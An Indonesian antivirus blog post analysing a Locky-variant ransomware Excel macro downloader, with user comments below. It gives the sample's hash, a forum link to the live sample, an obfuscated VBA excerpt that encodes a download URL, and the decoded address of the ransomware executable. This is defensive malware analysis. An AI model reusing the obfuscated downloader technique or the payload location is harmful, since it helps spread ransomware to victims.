Ransomware – VBA Downloader

Posted in internet, Trojan, Virus Asing on May 11, 2016

5. Label

Hampir sama dengan tulisan sebelumnya pada “Ransomware Locky – Virus dengan Tujuan Pemerasan“, yang berbeda adalah versi dari virus itu sendiri, tentunya berbeda pula server tempat file induk virus RansomWare ini berada.

Untuk contoh file VBA Downloader (file Excel) virus ini, dapat didownload pada (pastikan login agar bisa melihat lampiran): http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/msg240698/#msg240698

1. VBA Downloader

Karakteristik Virus

Nama lain virus: Locky-F
SHA256: 240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3
Analisis melalui VirusTotal.Com: https://virustotal.com/en/file/240B43DFC2712D7D40312E760BCCA5F9C7C259BBFA115C866127027346CB2FA3/analysis/

 

Macro pada file Excel

Sebagai penyebarannya, virus ini menggunakan atau lebih tepatnya memanfaatkan celah pada fungsi VBA dari Ms. Office untuk menjemput induknya yang berada dari server agar bisa masuk ke komputer korban. Karena pada umumnya Ms. Office digunakan untuk kegiatan mengolah data, sehingga sebuah antivirus tidak bisa langsung mendeteksi adanya ancaman dalam file Ms. Office kepunyaan user. Selain nantinya akan mengganggu kegiatan user, antivirus juga harus mempelajari lagi terlebih dahulu mengenai ‘bagaimana mendeteksi virus dalam sebuah file dokumen’, yang berbeda dengan teknik virus-virus lain sebelum zaman kejayaan virus berkriteria RansomWare atau virus pemeras ini, misal virus Ramnit yang bersarang dalam file executable (.exe) atau aplikasi.

2. Sec Warn Macro

Apa yang terjadi setelah user melakukan Enable pada Macro-nya Ms. Office?

Peringatan!

Kegiatan meng-Enable Macro yang padahal sudah tahu ada kode virus di dalam dokumen tersebut hanya dilakukan oleh Professional! Jangan coba di rumah! Resiko diluar tanggung jawab penulis!

3. Enable Macro

4. Err

Uppsss…. Karena saat menjalankan VBA Downloader (atau sebutan lainnya ‘Starter‘ atau ‘Launcher‘ ) dari virus RansomWare ini penulis tidak mengaktifkan paket data untuk akses ke initernet, sehingga proses mendownload virus dari server pembuat virus atau server yang telah di-Hack (diretas atau dibobol) oleh si pembuat virus menjadi tidak berhasil, dan muncul pesan error.

RansomWare Operation

Konsep RansomWare hingga ke server

Untuk situs tambahan, berikut ada juga analisis virus ini versi Bahasa Korea: http://story.malwares.com/79

Komponen VBA Macro RansomWare

Masih berlanjut ke VBA Macro, pada virus ini, ditemukan sebuah Form, dengan penampakan Form sebagai berikut:

5. Label

Sebuah Class (.cls):
1. Workbook_Open

6. AddSensors

Fungsi-fungsi dari sebuah Modul (.bas):
1. addProcess
2. AddSensors
3. CheckBins
4. Destroy
5. Draw
6. GameLoop
7. getDirectionTail
8. getTypeBodyCell
9. LoadLevel
10. LoadResource
11. MimoNasM
12. OnasOn
13. SaveMaps
14. Update
15. UpdateInput

7. Module1

Module1

8. String somehernya_7

String somehernya_7

Adapun kode yang berisi info mengenai alamat induk virus terdapat pada:

—-

Private Sub CheckBins()

somehernya_7 = Split(“1104|1116|1116|1112|1058|1047|1047|1115|1117|1103|1097|1114|1104|1111|1117|1115|1101|1057|1050|1056|1046|1099|1111|1109|1046|1109|1121|1047|1115|1121|1115|1116|1101|1109|1047|1108|1111|1103|1115|1047|1055|1054|1052|1055|1103|1100|1055|1098|1052|1051|1102|1052|1051|1046|1101|1120|1101”, _
“|”)

Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set somehernya_2 = CreateObject(dikenson(1))
GoTo DomSeiko

For LP = 1 To BM.StorCount
BinID = BM.StorID(LP)
If Not objSto.rages.IsItem(BinID) Then
BM.UnloadStor BinID
End If
Next LP

For Each objStorage In objS.torages
With objStorage
If Not BM.BinLoaded(.ID) Then
BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
End If

MapID = BM.BinMapID(.ID)
If MapID <> 0 And MapID <> .MapID Then
BM.UnloadStor .ID
BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
End If
End With
Next
On Error GoTo 0
ErrExit:
Exit Sub
DomSeiko:
Set somehernya_6 = CreateObject(dikenson(2))
Set bukinist = CreateObject(dikenson(3))
Set somehernya_3 = bukinist.Environment(dikenson(4))
getTypeBodyCell 1, 2, 3, 4, 5, 6
End Sub

—-

Setelah dilakukan dekrip pada string tersebut, didapat alamat induk virus yang sayangnya sudah tidak rusak di: http://sugarhouse928.com.my/system/logs/7647gd7b43f43.exe

9. Web Terdeteksi

Kesimpulan

Karena masing-masing user memiliki aktifitas berbeda, ada yang menggunakan file dokumen untuk menulis ‘berkas biasa’ saja, namun ada pula user yang memang menggunakan file dokumen (.doc, .xls) sebagai ‘berkas otomatis’ yang didalamnya terdapat perintah-perintah Macro yang dapat melakukan perhitungan atau pengolahan data laporan secara otomatis misalnya, maka tidak setiap file yang memiliki ciri-ciri ‘ada pesan pop-up untuk mengaktifkan atau Enable Macro‘ adalah Downloader virus Ransomware.

Tentunya, harus pastikan bahwa file yang kita buka tersebut adalah memang file kita atau dari teman yang memang dapat dipercaya, bukan dari akun tak dikenal yang masuk melalui EMail kita. Wah, jangan-jangan kedepannya virus RansomWare ini akan menyamar sebagai akun teman kita dari alamat yang memang alamat EMail teman kita dan menggunakan bahasa keseharian selayaknya saat kita berinteraksi dengan teman kita yang bersangkutan. Jangan-jangan….

 

Berdasarkan gambar dari Operasi RansomWare, maka untuk menjadi pembuat virus RansomWare seperti ini, dia haruslah seorang:

  1. EMail Spammer
  2. Document Expert
  3. Hacker
  4. Programmer
  5. Webmaster
  6. Account Holder

Dimulai Spam EMail, si pembuat virus mengirim lampiran dokumen ‘terotomatisasi’ yang diduga bahwa si pembuat virus adalah seorang yang terbiasa megelola dokumen, juga diduga sebagai Hacker yang mana setelah berhasil meretas situs website orang lalu dia meletakkan indukan virus pada server hasil buruannya tersebut, juga diduga kalau si pembuat virus RansomWare ini adalah ‘pemain lama’ dalam memprogram virus, dapat dilihat dari macam-macam aksi ‘luar biasa’ yang dimiliki virus RansomWare ini, selain itu, si pembuat virus ini diduga sebagai webmaster yang tau bagaimana memaksimalkan servernya sebagai ladang ‘uang haramnya’, dan yang terakhir, si pembuat virus RansomWare haruslah memiliki akun rekening maya untuk menerima uang tebusan dari user atau korban.

Tertarik memiliki kemampuan multitalent seperti pembuat virus RansomWare ini?

 

 

36 Responses to “Ransomware – VBA Downloader”


  1. Laouali Abdou says:

    Mon ordinateur est attaqué par un virus que je n’arrive pas à supprimer. Je pense avec cette version de Smadav mon problème sera résolu.

     
  2. ngela says:

    perfect

     
  3. Anonymous says:

    best

     
  4. i m very happy to use this antiviruis

     
  5. slamet riyanto says:

    komputer sering restart otomatis apakah karena virus

     


Leave a Reply


  • Search

    Loading
  • Wall

    Previous Next
    Latest on Mon, 12:16 am

    Mimose Desir: Je suis contente d'avoir cette nouvelle version

    Burlington coupons: Great product! Fast shipping! Thanks. Burlington coupons http://www.burlingtoncoatcoupons.com

    titus: good one

    titus: good

    ochitiga muzamil: perfect one

    djkaybee: good one

    okochi emmanuel: perfect service

    Asmawi: Ingin yang terbaik

    carolyn: very good

    mubarak rabiu: good experiance

    » Tuliskan komentar Anda :